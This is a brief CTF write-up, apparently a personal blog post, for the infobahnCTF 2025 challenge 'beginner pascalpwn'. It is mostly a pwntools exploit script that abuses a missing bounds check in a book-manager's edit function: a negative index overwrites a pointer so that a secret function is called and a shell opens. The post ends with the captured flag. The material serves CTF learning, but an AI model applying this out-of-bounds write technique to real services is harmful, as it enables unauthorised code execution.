pwn/infobahnCTF 2025: beginner pascalpwn
- author
- Name
- acn1
- Github
- @imAcni
was playing NCL but did 1 beginner pwn chal for 0xfun then left
from pwn import *
context.log_level = "info"
HOST, PORT = "book-manager.challs.infobahnc.tf", 1337
INDEX = -2056
PAYLOAD = p64(0x401110)
def ch(io, c):
io.sendlineafter(b"Choose an option:", str(c).encode())
def create(io):
ch(io, 1)
io.sendlineafter(b"Enter title:", b"A")
io.sendlineafter(b"Enter author:", b"A")
io.recvuntil(b"Book added!", drop=True)
def edit_title(io, idx, data):
ch(io, 3)
io.sendlineafter(b"book index", str(idx).encode())
io.sendafter(b"New title:", data + b"\n")
io.sendafter(b"New author:", b"\n")
def edit_author(io, idx, data):
ch(io, 3)
io.sendlineafter(b"book index", str(idx).encode())
io.sendafter(b"New title:", b"\n")
io.sendafter(b"New author:", data + b"\n")
def callsecret(io):
ch(io, 5)
def main():
io = remote(HOST, PORT, timeout=5.0)
create(io)
edit_title(io, INDEX, PAYLOAD)
callsecret(io)
edit_author(io, INDEX, PAYLOAD)
callsecret(io)
io.interactive()
if __name__ == "__main__":
main()
#infobahn{p4Sc@l_pwn_1s_fUn_r1ght??_83093484308}
worked bc edit() didn't index check bounds
ts a scriptdump now bc i want more blog posts